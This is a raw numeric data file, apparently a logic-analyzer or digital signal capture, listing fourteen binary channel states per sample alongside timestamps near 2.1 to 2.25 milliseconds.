0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1133960e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1134120e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1134360e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1134440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1134640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1134880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1135160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1135400e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1135640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1135880e-03 0,0,0,0,0,0,1,0,0,0,0,0,0,0,2.1135920e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1135960e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1136120e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1136400e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1136440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1136640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1136920e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1137160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1137400e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1137640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1137880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1138120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1138360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1138600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1138840e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1139120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1139360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1139640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1139880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1140120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1140360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1140600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1140840e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1141120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1141360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1141640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1141880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1142120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1142360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1142600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1142840e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1143120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1143360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1143640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1143880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1144120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1144360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1144600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1144840e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1145120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1145360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1145640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1145880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1146120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1146360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1146600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1146840e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1147120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1147360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1147640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1147880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1148120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1148360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1148600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1148840e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1149120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1149360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1149640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1149880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1150120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1150360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1150600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1150840e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1151120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1151360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1151640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1151880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1152120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1152360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1152600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1152840e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1153120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1153360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1153640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1153880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1154120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1154360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1154600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1154840e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1155120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1155360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1155640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1155880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1156120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1156360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1156600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1156840e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1157120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1157360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1157640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1157880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1158120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1158360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1158600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1158840e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1159120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1159360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1159640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1159880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1160120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1160360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1160600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1160840e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1161120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1161360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1161640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1161880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1162120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1162360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1162600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1162840e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1163160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1163360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1163640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1163880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1164120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1164360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1164600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1164840e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1165160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1165360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1165640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1165880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1166120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1166400e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1166600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1166920e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1167160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1167400e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1167640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1167880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1168120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1168400e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1168640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1168880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1169160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1169400e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1169640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1169880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1170120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1170360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1170640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1170920e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1171160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1171400e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.2421160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.2423640e-03 1,0,0,0,0,0,0,0,0,0,0,1,0,1,2.2423880e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.2424200e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,1,2.2427320e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.2427560e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,1,2.2428040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.2428280e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,1,2.2428800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.2429040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,1,2.2429560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.2429800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2430120e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2430280e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2430520e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2431080e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2431320e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2431560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2431800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2432280e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2432520e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2433040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2433320e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2433800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2434040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2434560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2434800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2435320e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2435560e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2436040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2436280e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2436520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2436760e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2437000e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2437240e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2437800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2438040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2438520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2438760e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2439280e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2439520e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2440040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2440280e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2440520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2440760e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2441000e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2441240e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2441800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2442040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2442520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2442760e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2443280e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2443520e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2444040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2444280e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2444760e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2445000e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2445520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2445800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2446040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2446280e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2446520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2446760e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2447000e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2447320e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2447560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2447800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2448040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2448280e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2448520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2448800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2449040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2449320e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2449560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2449800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2450280e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2450520e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2451040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2451320e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2451800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2452040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2452560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2452800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2453320e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2453560e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2453800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2454040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2454280e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2454520e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2454800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2455040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2455320e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2455560e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2455800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2456040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2456280e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2456520e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2457080e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2457320e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2457560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2457800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2458040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2458280e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2458520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2458800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2459040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2459320e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2459560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2459800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2460040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2460280e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2460520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2460800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2461040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2461320e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2461560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2461800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2462040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2462280e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2462520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2462800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2463040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2463320e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2463560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2463800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2464040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2464280e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2464520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2464800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2465040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2465320e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2465800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2466040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2466280e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2466520e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2466800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2467040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2467320e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2467560e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2467800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2468040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2468280e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2468520e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2468800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2469040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2469320e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2469560e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2469800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2470040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2470560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2470800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2471320e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2471560e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2471800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2472040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2472280e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2472520e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2472800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2473040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2473320e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2473560e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2474040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2474280e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2474800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2475040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2475560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2475800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2476280e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2476520e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2477080e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2477320e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2477560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2477800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2478040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2478280e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2478520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2478800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2479040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2479320e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2479560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2479800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2480040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2480280e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2480520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2480800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2481040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2481320e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2481800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2482040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2482280e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2482520e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2482800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2483080e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2483320e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2483600e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2483800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2484040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2484320e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2484560e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2484840e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2485080e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2485560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2485800e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2486320e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2486600e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2487080e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2487320e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2487800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2488080e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2488600e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2488840e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2489320e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2489560e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2489800e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2490040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2490320e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2490560e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2490840e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2491080e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2491320e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2491560e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2491840e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2492040e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2492360e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2492600e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2492840e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2493120e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2493360e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2493640e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2493880e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2494120e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2494360e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2494600e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2494840e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2495120e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2495360e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2495640e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2495880e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2496120e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2496360e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2496600e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2496840e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2497120e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2497360e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2497640e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2497880e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2498120e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2498360e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.2498600e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.2498840e-03 